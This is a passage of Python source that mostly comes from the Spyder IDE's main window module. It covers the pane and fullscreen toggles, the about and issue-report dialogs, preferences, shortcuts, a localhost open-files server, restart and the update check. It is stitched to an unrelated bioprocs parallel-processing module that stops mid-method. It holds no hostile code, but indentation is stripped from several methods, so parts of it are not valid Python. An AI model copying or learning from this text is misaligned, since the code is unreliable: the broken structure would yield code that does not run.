tip = _("Maximize current pane")
icon = ima.icon('maximize')
else:
text = _("Restore current pane")
tip = _("Restore pane to its original size")
icon = ima.icon('unmaximize')
self.maximize_action.setText(text)
self.maximize_action.setIcon(icon)
self.maximize_action.setToolTip(tip)
    @Slot()
    def maximize_dockwidget(self, restore=False):
        """Shortcut: Ctrl+Alt+Shift+M
        First call: maximize current dockwidget
        Second call (or restore=True): restore original window layout"""
        if self.state_before_maximizing is None:
            if restore:
                # Nothing to restore.
                return
            # No plugin is currently maximized: maximizing focus plugin
            self.state_before_maximizing = self.saveState()
            focus_widget = QApplication.focusWidget()
            for plugin in self.widgetlist:
                plugin.dockwidget.hide()
                if plugin.isAncestorOf(focus_widget):
                    self.last_plugin = plugin
            # Prevent the user from toggling the (now central) plugin's dock.
            self.last_plugin.dockwidget.toggleViewAction().setDisabled(True)
            self.setCentralWidget(self.last_plugin)
            self.last_plugin.ismaximized = True
            # Workaround to solve an issue with editor's outline explorer:
            # (otherwise the whole plugin is hidden and so is the outline explorer
            # and the latter won't be refreshed if not visible)
            self.last_plugin.show()
            self.last_plugin.visibility_changed(True)
            if self.last_plugin is self.editor:
                # Automatically show the outline if the editor was maximized:
                self.addDockWidget(Qt.RightDockWidgetArea,
                                   self.outlineexplorer.dockwidget)
                self.outlineexplorer.dockwidget.show()
        else:
            # Restore original layout (before maximizing current dockwidget)
            self.last_plugin.dockwidget.setWidget(self.last_plugin)
            self.last_plugin.dockwidget.toggleViewAction().setEnabled(True)
            self.setCentralWidget(None)
            self.last_plugin.ismaximized = False
            self.restoreState(self.state_before_maximizing)
            self.state_before_maximizing = None
            self.last_plugin.get_focus_widget().setFocus()
        self.__update_maximize_action()
def __update_fullscreen_action(self):
if self.isFullScreen():
icon = ima.icon('window_nofullscreen')
else:
icon = ima.icon('window_fullscreen')
if is_text_string(icon):
icon = get_icon(icon)
self.fullscreen_action.setIcon(icon)
    @Slot()
    def toggle_fullscreen(self):
        """Toggle the main window between fullscreen and normal mode."""
        if self.isFullScreen():
            self.fullscreen_flag = False
            self.showNormal()
            # Re-maximize if the window was maximized before going
            # fullscreen.
            if self.maximized_flag:
                self.showMaximized()
        else:
            self.maximized_flag = self.isMaximized()
            self.fullscreen_flag = True
            self.showFullScreen()
        self.__update_fullscreen_action()
def add_to_toolbar(self, toolbar, widget):
"""Add widget actions to toolbar"""
actions = widget.toolbar_actions
if actions is not None:
add_actions(toolbar, actions)
    @Slot()
    def about(self):
        """Show the About Spyder dialog box."""
        versions = get_versions()
        # Show Mercurial revision for development version
        revlink = ''
        if versions['revision']:
            rev = versions['revision']
            revlink = " (<a href='https://github.com/spyder-ide/spyder/"\
                      "commit/%s'>Commit: %s</a>)" % (rev, rev)
        # The HTML body below is interpolated with version/URL data; it is
        # kept byte-for-byte as it is user-visible text.
        QMessageBox.about(self,
            _("About %s") % "Spyder",
            """<b>Spyder %s</b> %s
            <br>The Scientific PYthon Development EnviRonment
            <br>Copyright &copy; The Spyder Project Contributors
            <br>Licensed under the terms of the MIT License
            <p>Created by Pierre Raybaut
            <br>Developed and maintained by the
            <a href="%s/blob/master/AUTHORS">Spyder Project Contributors</a>
            <br>Many thanks to all the Spyder beta-testers and regular users.
            <p>Most of the icons come from the Crystal Project
            (&copy; 2006-2007 Everaldo Coelho). Other icons by
            <a href="http://p.yusukekamiyamane.com/"> Yusuke Kamiyamane</a>
            (all rights reserved) and by
            <a href="http://www.oxygen-icons.org/">
            The Oxygen icon theme</a>.
            <p>For bug reports and feature requests, please go
            to our <a href="%s">Github website</a>. For discussions around the
            project, please go to our <a href="%s">Google Group</a>
            <p>This project is part of a larger effort to promote and
            facilitate the use of Python for scientific and engineering
            software development. The popular Python distributions
            <a href="http://continuum.io/downloads">Anaconda</a>,
            <a href="https://winpython.github.io/">WinPython</a> and
            <a href="http://code.google.com/p/pythonxy/">Python(x,y)</a>
            also contribute to this plan.
            <p>Python %s %dbits, Qt %s, %s %s on %s"""
            % (versions['spyder'], revlink, __project_url__,
               __project_url__, __forum_url__, versions['python'],
               versions['bitness'], versions['qt'], versions['qt_api'],
               versions['qt_api_ver'], versions['system']))
    @Slot()
    def show_dependencies(self):
        """Show Spyder's Dependencies dialog box"""
        from spyder.widgets.dependencies import DependenciesDialog
        dlg = DependenciesDialog(None)
        dlg.set_data(dependencies.DEPENDENCIES)
        # show() then exec_(): display immediately, then block modally.
        dlg.show()
        dlg.exec_()
    @Slot()
    def report_issue(self):
        """Open a pre-filled Github issue in the default web browser."""
        # quote lives in different modules on Python 2 vs 3.
        if PY3:
            from urllib.parse import quote
        else:
            from urllib import quote     # analysis:ignore
        versions = get_versions()
        # Get git revision for development version
        revision = ''
        if versions['revision']:
            revision = versions['revision']
        # Markdown template for the issue body (user-visible text; kept
        # byte-for-byte).
        issue_template = """\
## Description
**What steps will reproduce the problem?**
1.
2.
3.
**What is the expected output? What do you see instead?**
**Please provide any additional information below**
## Version and main components
* Spyder Version: %s %s
* Python Version: %s
* Qt Versions: %s, %s %s on %s
## Dependencies
```
%s
```
""" % (versions['spyder'],
       revision,
       versions['python'],
       versions['qt'],
       versions['qt_api'],
       versions['qt_api_ver'],
       versions['system'],
       dependencies.status())
        url = QUrl("https://github.com/spyder-ide/spyder/issues/new")
        # Qt5 moved query manipulation to QUrlQuery.
        if PYQT5:
            from qtpy.QtCore import QUrlQuery
            query = QUrlQuery()
            query.addQueryItem("body", quote(issue_template))
            url.setQuery(query)
        else:
            url.addEncodedQueryItem("body", quote(issue_template))
        QDesktopServices.openUrl(url)
@Slot()
def google_group(self):
url = QUrl("http://groups.google.com/group/spyderlib")
QDesktopServices.openUrl(url)
    @Slot()
    def global_callback(self):
        """Global callback"""
        widget = QApplication.focusWidget()
        action = self.sender()
        # The triggering action stores the name of the editor method to run.
        callback = from_qvariant(action.data(), to_text_string)
        from spyder.widgets.editor import TextEditBaseWidget
        # Only dispatch when the focused widget is one of our text editors.
        if isinstance(widget, TextEditBaseWidget):
            getattr(widget, callback)()
def redirect_internalshell_stdio(self, state):
if state:
self.console.shell.interpreter.redirect_stds()
else:
self.console.shell.interpreter.restore_stds()
    def open_external_console(self, fname, wdir, args, interact, debug, python,
                              python_args, systerm, post_mortem=False):
        """Open external console.

        If *systerm* is True the script runs in an OS terminal window;
        otherwise it runs in Spyder's External Console plugin.
        """
        if systerm:
            # Running script in an external system terminal
            try:
                programs.run_python_script_in_terminal(fname, wdir, args,
                                                interact, debug, python_args)
            except NotImplementedError:
                # Not available on every platform (e.g. some Unixes).
                QMessageBox.critical(self, _("Run"),
                                     _("Running an external system terminal "
                                       "is not supported on platform %s."
                                       ) % os.name)
        else:
            self.extconsole.visibility_changed(True)
            self.extconsole.raise_()
            self.extconsole.start(
                fname=to_text_string(fname), wdir=to_text_string(wdir),
                args=to_text_string(args), interact=interact,
                debug=debug, python=python, post_mortem=post_mortem,
                python_args=to_text_string(python_args) )
def execute_in_external_console(self, lines, focus_to_editor):
"""
Execute lines in external or IPython console and eventually set focus
to the editor
"""
console = self.extconsole
if self.ipyconsole is None or self.last_console_plugin_focus_was_python:
console = self.extconsole
else:
console = self.ipyconsole
console.visibility_changed(True)
console.raise_()
console.execute_python_code(lines)
if focus_to_editor:
self.editor.visibility_changed(True)
    def open_file(self, fname, external=False):
        """
        Open filename with the appropriate application
        Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
        or open file outside Spyder (if extension is not supported)
        """
        fname = to_text_string(fname)
        ext = osp.splitext(fname)[1]
        # Importable data files go to the Variable Explorer.
        if self.variableexplorer is not None and ext in IMPORT_EXT:
            self.variableexplorer.import_data(fname)
        elif encoding.is_text_file(fname):
            self.editor.load(fname)
        elif not external:
            # Fall back to the OS default application, unless the call
            # itself came from outside Spyder (avoids open loops).
            fname = file_uri(fname)
            programs.start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
fname = encoding.to_unicode_from_fs(fname)
if osp.isfile(fname):
self.open_file(fname, external=True)
elif osp.isfile(osp.join(CWD, fname)):
self.open_file(osp.join(CWD, fname), external=True)
#---- PYTHONPATH management, etc.
def get_spyder_pythonpath(self):
"""Return Spyder PYTHONPATH"""
return self.path+self.project_path
def add_path_to_sys_path(self):
"""Add Spyder path to sys.path"""
for path in reversed(self.get_spyder_pythonpath()):
sys.path.insert(1, path)
def remove_path_from_sys_path(self):
"""Remove Spyder path from sys.path"""
sys_path = sys.path
while sys_path[1] in self.get_spyder_pythonpath():
sys_path.pop(1)
    @Slot()
    def path_manager_callback(self):
        """Spyder path manager"""
        from spyder.widgets.pathmanager import PathManager
        # Paths are removed before editing and re-added afterwards so
        # sys.path reflects the dialog's result.
        self.remove_path_from_sys_path()
        project_path = self.projects.get_pythonpath()
        dialog = PathManager(self, self.path, project_path, sync=True)
        dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
        dialog.exec_()
        self.add_path_to_sys_path()
        encoding.writelines(self.path, self.SPYDER_PATH) # Saving path
        self.sig_pythonpath_changed.emit()
    def pythonpath_changed(self):
        """Projects PYTHONPATH contribution has changed"""
        # Order matters: drop the old paths before recomputing the project
        # contribution, then re-add the merged list.
        self.remove_path_from_sys_path()
        self.project_path = self.projects.get_pythonpath()
        self.add_path_to_sys_path()
        self.sig_pythonpath_changed.emit()
    @Slot()
    def win_env(self):
        """Show Windows current user environment variables"""
        self.dialog_manager.show(WinUserEnvDialog(self))
#---- Preferences
def apply_settings(self):
"""Apply settings changed in 'Preferences' dialog box"""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes Issue 2036
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
else:
qapp.setStyle(CONF.get('main', 'windows_style',
self.default_style))
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
if CONF.get('main', 'animated_docks'):
default = default|QMainWindow.AnimatedDocks
self.setDockOptions(default)
self.apply_panes_settings()
self.apply_statusbar_settings()
def apply_panes_settings(self):
"""Update dockwidgets features settings"""
# Update toggle action on menu
for child in self.widgetlist:
features = child.FEATURES
if CONF.get('main', 'vertical_dockwidget_titlebars'):
features = features | QDockWidget.DockWidgetVerticalTitleBar
if not self.dockwidgets_locked:
features = features | QDockWidget.DockWidgetMovable
child.dockwidget.setFeatures(features)
child.update_margins()
def apply_statusbar_settings(self):
"""Update status bar widgets settings"""
show_status_bar = CONF.get('main', 'show_status_bar')
self.statusBar().setVisible(show_status_bar)
if show_status_bar:
for widget, name in ((self.mem_status, 'memory_usage'),
(self.cpu_status, 'cpu_usage')):
if widget is not None:
widget.setVisible(CONF.get('main', '%s/enable' % name))
widget.set_interval(CONF.get('main', '%s/timeout' % name))
else:
return
    @Slot()
    def edit_preferences(self):
        """Open and run the Preferences dialog.

        Builds the general pages first, then one page per plugin that
        provides a config widget, restores the previously used size and
        page index, and runs the dialog modally.
        """
        from spyder.plugins.configdialog import ConfigDialog
        dlg = ConfigDialog(self)
        dlg.size_change.connect(self.set_prefs_size)
        if self.prefs_dialog_size is not None:
            # Restore the size the user last gave the dialog
            dlg.resize(self.prefs_dialog_size)
        for PrefPageClass in self.general_prefs:
            widget = PrefPageClass(dlg, main=self)
            widget.initialize()
            dlg.add_page(widget)
        # A failure in a single (possibly third-party) plugin's config page
        # must not break the whole dialog, hence the per-plugin try/except.
        for plugin in [self.workingdirectory, self.editor,
                       self.projects, self.extconsole, self.ipyconsole,
                       self.historylog, self.help, self.variableexplorer,
                       self.onlinehelp, self.explorer, self.findinfiles
                       ]+self.thirdparty_plugins:
            if plugin is not None:
                try:
                    widget = plugin.create_configwidget(dlg)
                    if widget is not None:
                        dlg.add_page(widget)
                except Exception:
                    traceback.print_exc(file=sys.stderr)
        if self.prefs_index is not None:
            # Reopen on the page the user last visited
            dlg.set_current_index(self.prefs_index)
        dlg.show()
        dlg.check_all_settings()
        dlg.pages_widget.currentChanged.connect(self.__preference_page_changed)
        dlg.exec_()
    def __preference_page_changed(self, index):
        """Remember the active preference page so the dialog reopens on it."""
        self.prefs_index = index
    def set_prefs_size(self, size):
        """Save preferences dialog size so it can be restored on reopen."""
        self.prefs_dialog_size = size
#---- Shortcuts
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_sc_to_tip=False):
"""
Register QAction or QShortcut to Spyder main application,
with shortcut (context, name, default)
"""
self.shortcut_data.append( (qaction_or_qshortcut, context,
name, add_sc_to_tip) )
    def apply_shortcuts(self):
        """Apply shortcuts settings to all widgets/plugins registered via
        register_shortcut(), pruning entries whose Qt object has died."""
        toberemoved = []
        for index, (qobject, context, name,
                    add_sc_to_tip) in enumerate(self.shortcut_data):
            keyseq = QKeySequence( get_shortcut(context, name) )
            try:
                if isinstance(qobject, QAction):
                    # On macOS, actions marked with the 'missing' sentinel
                    # store their shortcut on the attribute instead of
                    # setting it on the action itself.
                    if sys.platform == 'darwin' and \
                      qobject._shown_shortcut == 'missing':
                        qobject._shown_shortcut = keyseq
                    else:
                        qobject.setShortcut(keyseq)
                    if add_sc_to_tip:
                        add_shortcut_to_tooltip(qobject, context, name)
                elif isinstance(qobject, QShortcut):
                    qobject.setKey(keyseq)
            except RuntimeError:
                # The underlying C++ object has been deleted by Qt;
                # remember its index so the entry can be dropped.
                toberemoved.append(index)
        # Pop from the end so earlier indices remain valid while popping.
        for index in sorted(toberemoved, reverse=True):
            self.shortcut_data.pop(index)
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
while 1: # 1 is faster than True
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See Issue 1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
# ---- Quit and restart, and reset spyder defaults
    @Slot()
    def reset_spyder(self):
        """
        Quit and reset Spyder and then Restart application.

        Asks for confirmation first, since restarting with reset=True
        wipes the user's settings.
        """
        answer = QMessageBox.warning(self, _("Warning"),
             _("Spyder will restart and reset to default settings: <br><br>"
               "Do you want to continue?"),
             QMessageBox.Yes | QMessageBox.No)
        if answer == QMessageBox.Yes:
            self.restart(reset=True)
    @Slot()
    def restart(self, reset=False):
        """
        Quit and Restart Spyder application.

        If reset is True, Spyder is reset to factory defaults on restart.
        The restart itself is delegated to spyder/app/restart.py run in a
        subprocess; everything it needs is handed over via environment
        variables (SPYDER_ARGS, SPYDER_PID, SPYDER_IS_BOOTSTRAP,
        SPYDER_RESET).
        """
        # Get start path to use in restart script
        spyder_start_directory = get_module_path('spyder')
        restart_script = osp.join(spyder_start_directory, 'app', 'restart.py')
        # Get any initial argument passed when spyder was started
        # Note: Variables defined in bootstrap.py and spyder/app/start.py
        env = os.environ.copy()
        bootstrap_args = env.pop('SPYDER_BOOTSTRAP_ARGS', None)
        # NOTE(review): raises KeyError if SPYDER_ARGS is unset; presumably
        # start.py always defines it — confirm before hardening.
        spyder_args = env.pop('SPYDER_ARGS')
        # Get current process and python running spyder
        pid = os.getpid()
        python = sys.executable
        # Check if started with bootstrap.py
        if bootstrap_args is not None:
            spyder_args = bootstrap_args
            is_bootstrap = True
        else:
            is_bootstrap = False
        # Pass variables as environment variables (str) to restarter subprocess
        env['SPYDER_ARGS'] = spyder_args
        env['SPYDER_PID'] = str(pid)
        env['SPYDER_IS_BOOTSTRAP'] = str(is_bootstrap)
        env['SPYDER_RESET'] = str(reset)
        if DEV:
            # Propagate the development sys.path with the OS path separator
            if os.name == 'nt':
                env['PYTHONPATH'] = ';'.join(sys.path)
            else:
                env['PYTHONPATH'] = ':'.join(sys.path)
        # Build the command and popen arguments depending on the OS
        if os.name == 'nt':
            # Hide flashing command prompt
            startupinfo = subprocess.STARTUPINFO()
            startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
            shell = False
        else:
            startupinfo = None
            shell = True
        command = '"{0}" "{1}"'
        command = command.format(python, restart_script)
        try:
            if self.closing(True):
                subprocess.Popen(command, shell=shell, env=env,
                                 startupinfo=startupinfo)
                self.console.quit()
        except Exception as error:
            # If there is an error with subprocess, Spyder should not quit and
            # the error can be inspected in the internal console
            print(error)
            print(command)
# ---- Interactive Tours
    def show_tour(self, index):
        """Start the interactive tour number `index` from tours_available."""
        frames = self.tours_available[index]
        self.tour.set_tour(index, frames, self)
        self.tour.start_tour()
# ---- Check for Spyder Updates
    def _check_updates_ready(self):
        """Called by WorkerUpdates when ready.

        Shows the appropriate dialog (error / update available / up to
        date), persists the "check on startup" checkbox state, and
        re-enables the menu action.
        """
        from spyder.widgets.helperwidgets import MessageCheckBox
        # `feedback` = False is used on startup, so only positive feedback is
        # given. `feedback` = True is used after startup (when using the
        # menu action), and gives feedback whether updates are found or not.
        feedback = self.give_updates_feedback
        # Get results from worker
        update_available = self.worker_updates.update_available
        latest_release = self.worker_updates.latest_release
        error_msg = self.worker_updates.error
        url_r = 'https://github.com/spyder-ide/spyder/releases'
        url_i = 'http://pythonhosted.org/spyder/installation.html'
        # Define the custom QMessageBox
        box = MessageCheckBox()
        box.setWindowTitle(_("Spyder updates"))
        box.set_checkbox_text(_("Check for updates on startup"))
        box.setStandardButtons(QMessageBox.Ok)
        box.setDefaultButton(QMessageBox.Ok)
        box.setIcon(QMessageBox.Information)
        # Adjust the checkbox depending on the stored configuration
        section, option = 'main', 'check_updates_on_startup'
        check_updates = CONF.get(section, option)
        box.set_checked(check_updates)
        if error_msg is not None:
            # The worker failed (e.g. network error): show it verbatim
            msg = error_msg
            box.setText(msg)
            box.set_check_visible(False)
            box.exec_()
            check_updates = box.is_checked()
        else:
            if update_available:
                msg = _("<b>Spyder %s is available!</b> <br><br>Please use "
                        "your package manager to update Spyder or go to our "
                        "<a href=\"%s\">Releases</a> page to download this "
                        "new version. <br><br>If you are not sure how to "
                        "proceed to update Spyder please refer to our "
                        " <a href=\"%s\">Installation</a> instructions."
                        "") % (latest_release, url_r, url_i)
                box.setText(msg)
                box.set_check_visible(True)
                box.exec_()
                check_updates = box.is_checked()
            elif feedback:
                # Only report "up to date" when the user explicitly asked
                msg = _("Spyder is up to date.")
                box.setText(msg)
                box.set_check_visible(False)
                box.exec_()
                check_updates = box.is_checked()
        # Update checkbox based on user interaction
        CONF.set(section, option, check_updates)
        # Enable check_updates_action after the thread has finished
        self.check_updates_action.setDisabled(False)
        # Provide feedback when clicking menu if check on startup is on
        self.give_updates_feedback = True
    @Slot()
    def check_updates(self):
        """
        Check for spyder updates on github releases using a QThread.

        Spawns a WorkerUpdates on a fresh QThread; _check_updates_ready is
        invoked with the result and the thread quits when the worker is
        done.
        """
        from spyder.workers.updates import WorkerUpdates
        # Disable check_updates_action while the thread is working
        self.check_updates_action.setDisabled(True)
        # Drop any previous, still-running check before starting a new one
        if self.thread_updates is not None:
            self.thread_updates.terminate()
        self.thread_updates = QThread(self)
        self.worker_updates = WorkerUpdates(self)
        self.worker_updates.sig_ready.connect(self._check_updates_ready)
        self.worker_updates.sig_ready.connect(self.thread_updates.quit)
        self.worker_updates.moveToThread(self.thread_updates)
        self.thread_updates.started.connect(self.worker_updates.start)
        self.thread_updates.start()
#==============================================================================
# Utilities to create the 'main' function
#==============================================================================
def initialize():
    """Initialize Qt, patching sys.exit and eventually setting up ETS.

    Returns the already-created QApplication after installing several
    monkey patches that keep third-party code from interfering with
    Spyder's own event loop.
    """
    # This doesn't create our QApplication, just holds a reference to
    # MAIN_APP, created above to show our splash screen as early as
    # possible
    app = qapplication()
    #----Monkey patching QApplication
    class FakeQApplication(QApplication):
        """Spyder's fake QApplication"""
        def __init__(self, args):
            self = app  # analysis:ignore
        @staticmethod
        def exec_():
            """Do nothing because the Qt mainloop is already running"""
            pass
    from qtpy import QtWidgets
    QtWidgets.QApplication = FakeQApplication
    #----Monkey patching rope
    try:
        from spyder import rope_patch
        rope_patch.apply()
    except ImportError:
        # rope is not installed
        pass
    #----Monkey patching sys.exit
    # The argument is ignored; use None instead of the original mutable
    # default `arg=[]` (shared-mutable-default pitfall).
    def fake_sys_exit(arg=None):
        pass
    sys.exit = fake_sys_exit
    #----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
    if PYQT5:
        def spy_excepthook(type_, value, tback):
            sys.__excepthook__(type_, value, tback)
        sys.excepthook = spy_excepthook
    # Removing arguments from sys.argv as in standard Python interpreter
    sys.argv = ['']
    # Selecting Qt4 backend for Enthought Tool Suite (if installed)
    try:
        from enthought.etsconfig.api import ETSConfig
        ETSConfig.toolkit = 'qt4'
    except ImportError:
        pass
    return app
class Spy(object):
    """
    Inspect Spyder internals.

    Attributes:
        app      Reference to main QApplication object
        window   Reference to spyder.MainWindow widget
    """
    def __init__(self, app, window):
        self.app = app
        self.window = window

    def __dir__(self):
        # Instance attributes first, then public class members.
        names = list(self.__dict__.keys())
        names.extend(name for name in dir(self.__class__)
                     if not name.startswith('_'))
        return names

    def versions(self):
        return get_versions()
def run_spyder(app, options, args):
    """
    Create and show Spyder's main window
    Start QApplication event loop

    app:     QApplication returned by initialize()
    options: parsed command line options
    args:    remaining positional arguments (files to open on startup)
    """
    # Main window
    main = MainWindow(options)
    try:
        main.setup()
    except BaseException:
        # Shut down the internal interpreter cleanly before propagating
        if main.console is not None:
            try:
                main.console.shell.exit_interpreter()
            except BaseException:
                pass
        raise
    main.show()
    main.post_visible_setup()
    if main.console:
        # Expose a `spy` helper in the internal console for introspection
        main.console.shell.interpreter.namespace['spy'] = \
                                        Spy(app=app, window=main)
    # Open external files passed as args
    if args:
        for a in args:
            main.open_external_file(a)
    # Don't show icons in menus for Mac
    if sys.platform == 'darwin':
        QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)
    # Open external files with our Mac app
    if running_in_mac_app():
        app.sig_open_external_file.connect(main.open_external_file)
    # To give focus again to the last focused widget after restoring
    # the window
    app.focusChanged.connect(main.change_last_focused_widget)
    app.exec_()
    return main
#==============================================================================
# Main
#==============================================================================
def main():
    """Main function: parse options, run maintenance commands or start the
    Spyder GUI, flagging a crash for the next session on failure."""
    # **** Collect command line options ****
    # Note regarding Options:
    # It's important to collect options before monkey patching sys.exit,
    # otherwise, optparse won't be able to exit if --help option is passed
    options, args = get_options()
    if set_attached_console_visible is not None:
        set_attached_console_visible(DEBUG or options.show_console \
                                     or options.reset_config_files \
                                     or options.reset_to_defaults \
                                     or options.optimize)
    app = initialize()
    if options.reset_config_files:
        # <!> Remove all configuration files!
        reset_config_files()
        return
    elif options.reset_to_defaults:
        # Reset Spyder settings to defaults
        CONF.reset_to_defaults(save=True)
        return
    elif options.optimize:
        # Optimize the whole Spyder's source code directory
        import spyder
        programs.run_python_script(module="compileall",
                                   args=[spyder.__path__[0]], p_args=['-O'])
        return
    # Show crash dialog
    if CONF.get('main', 'crash', False) and not DEV:
        CONF.set('main', 'crash', False)
        SPLASH.hide()
        QMessageBox.information(None, "Spyder",
            "Spyder crashed during last session.<br><br>"
            "If Spyder does not start at all and <u>before submitting a "
            "bug report</u>, please try to reset settings to defaults by "
            "running Spyder with the command line option '--reset':<br>"
            "<span style=\'color: #555555\'><b>python spyder --reset"
            "</b></span><br><br>"
            "<span style=\'color: #ff5555\'><b>Warning:</b></span> "
            "this command will remove all your Spyder configuration files "
            "located in '%s').<br><br>"
            "If restoring the default settings does not help, please take "
            "the time to search for <a href=\"%s\">known bugs</a> or "
            "<a href=\"%s\">discussions</a> matching your situation before "
            "eventually creating a new issue <a href=\"%s\">here</a>. "
            "Your feedback will always be greatly appreciated."
            "" % (get_conf_path(), __project_url__,
                  __forum_url__, __project_url__))
    # Create main window
    mainwindow = None
    try:
        mainwindow = run_spyder(app, options, args)
    except BaseException:
        CONF.set('main', 'crash', True)
        import traceback
        traceback.print_exc(file=STDERR)
        # Use a context manager so the crash-log handle is closed; the
        # original passed a bare open() whose handle was never closed.
        with open('spyder_crash.log', 'w') as crash_log:
            traceback.print_exc(file=crash_log)
    if mainwindow is None:
        # An exception occurred
        SPLASH.hide()
        return
    ORIGINAL_SYS_EXIT()
# Script entry point: run Spyder only when executed directly.
if __name__ == "__main__":
    main()
|
parallel.py | import threading
from time import sleep
from concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor
from bioprocs.utils.shell2 import runcmd
from traceback import format_exc
from queue import Queue
def distribute(total, nthread):
    """
    Try to distribute jobs into N threads as equal as possible.
    For example: distributing 10 jobs on 3 threads, we prefer (4, 3, 3) than (4, 4, 2)

    Every thread gets `total // nthread` jobs and the first
    `total % nthread` threads receive one extra job.

    @params:
        `total`: The total # jobs
        `nthread`: The # threads
    @returns:
        A list of # jobs distributed on each thread (empty when total <= 0).
    """
    # Guard: the original raised ZeroDivisionError for total == 0
    # (min(0, nthread) made the divisor 0).
    if total <= 0:
        return []
    nthread = min(total, nthread)
    base, extra = divmod(total, nthread)
    return [base + 1] * extra + [base] * (nthread - extra)
def distributeList(joblist, nthread):
    """Yield consecutive chunks of `joblist`, one chunk per thread, with
    chunk sizes computed by distribute()."""
    offset = 0
    for chunk_size in distribute(len(joblist), nthread):
        yield joblist[offset:offset + chunk_size]
        offset += chunk_size
class Parallel(object):
	"""Run a callable (or a shell-command template) over argument tuples
	in parallel.

	@params:
		`nthread`:  Number of worker threads/processes.
		`backend`:  'thread' (default) or 'process'/'multiprocessing'.
		`raiseExc`: Re-raise the last captured exception after all jobs ran.
	"""
	def __init__(self, nthread = 1, backend = 'thread', raiseExc = False):
		# The original used `backend.lower() in 'multiprocessing'`, a
		# substring test that also selected the process pool for '' and
		# accidental fragments like 'roce'. Use explicit names instead.
		use_processes = backend.lower() in ('process', 'processes', 'multiprocessing')
		PoolExecutor = ProcessPoolExecutor if use_processes else ThreadPoolExecutor
		self.executor = PoolExecutor(max_workers = nthread)
		self.raiseExc = raiseExc

	def __del__(self):
		# Best-effort cleanup of the worker pool.
		if self.executor:
			self.executor.shutdown()

	@staticmethod
	def _run(func, arg):
		"""Run one job: call `func(*arg)` if callable, otherwise treat
		`func` as a command template formatted with `arg` and run it."""
		if callable(func):
			ret = func(*arg)
			return ret
		else:
			return runcmd(func.format(*arg))

	def run(self, func, args):
		"""Submit one job per argument tuple and collect results in order.

		Exceptions are captured per job; if raiseExc is set, the last one
		is re-raised (with its formatted traceback as message) after all
		jobs have been collected.
		"""
		submits = []
		results = []
		exception = None
		excno = 0
		for arg in args:
			submits.append(self.executor.submit(Parallel._run, func, arg))
		for submit in submits:
			try:
				results.append(submit.result())
			except Exception as ex:
				exception = type(ex), format_exc()
				excno += 1
		if excno > 0 and self.raiseExc:
			raise exception[0](exception[1])
		return results
class LargeFileHandler(object):
	"""Process a large file in fixed-size chunks using worker threads.

	Chunks are computed in parallel, but summarized strictly in the order
	they were read: workers busy-wait on the class-level HAND counter
	until the previous chunk's summary has been emitted.
	"""
	# Index of the last chunk whose summary has completed; -1 means none.
	HAND = -1
	def __init__(self, reader, compute = None, summarize = None, compute_multi = None, summarize_multi = None, size = 1000, readfunc = lambda r: next(r), nthread = 1, raiseExc = True):
		"""
		reader:          the object `readfunc` pulls records from
		compute:         per-record computation (exclusive with compute_multi)
		summarize:       per-computed-record summarizer (exclusive with summarize_multi)
		compute_multi:   whole-chunk computation
		summarize_multi: whole-chunk summarizer
		size:            records per chunk
		readfunc:        pulls one record; returning False ends the current
		                 chunk, returning None stops all further reading
		nthread:         number of worker threads
		raiseExc:        re-raise exceptions raised inside workers
		"""
		LargeFileHandler.HAND = -1
		self.reader = reader
		self.readfunc = readfunc
		self.raiseExc = raiseExc
		self.size = size
		self.queue = Queue()
		self.nthread = nthread
		self.compute = compute
		self.summarize = summarize
		self.compute_multi = compute_multi
		self.summarize_multi = summarize_multi
		# Next chunk index to hand out
		self.index = 0
		# Serializes access to the reader across worker threads
		self.lock = threading.Lock()
		# Set once readfunc signals end-of-input with None
		self.stop = False
		if self.compute and self.compute_multi:
			raise ValueError('Only one of compute and compute_multi is needed.')
		if self.summarize and self.summarize_multi:
			raise ValueError('Only one of summarize and summarize_multi is needed.')
		if not callable(self.compute) and not callable(self.compute_multi):
			raise ValueError('One of compute and compute_multi is needed.')
		if not callable(self.summarize) and not callable(self.summarize_multi):
			raise ValueError('One of summarize and summarize_multi is needed.')
		# Pre-fill the queue with one chunk per worker thread
		for _ in range(nthread):
			self.producer()
	def producer(self):
		"""Read up to `size` records and enqueue them as one indexed chunk."""
		if self.stop: return
		with self.lock:
			lines = []
			for _ in range(self.size):
				try:
					line = self.readfunc(self.reader)
					if line is False: break
					if line is None:
						self.stop = True
						break
					lines.append(line)
				except StopIteration:
					break
			if lines:
				self.queue.put((self.index, lines))
				self.index += 1
	def run(self):
		"""Start the worker pool and block until all queued chunks are done."""
		for _ in range(self.nthread):
			t = threading.Thread(target = self.worker)
			t.daemon = True
			t.start()
		self.queue.join()
	def worker(self):
		"""Worker loop: compute a chunk, wait its turn, summarize, refill."""
		while not self.queue.empty():
			index, data = self.queue.get()
			try:
				if self.compute:
					computed = [self.compute(d) for d in data]
				else:
					computed = self.compute_multi(data)
				# Busy-wait until the previous chunk has been summarized so
				# summaries are emitted in original read order.
				while LargeFileHandler.HAND + 1 != index:
					sleep(.01)
				if self.summarize:
					for c in computed:
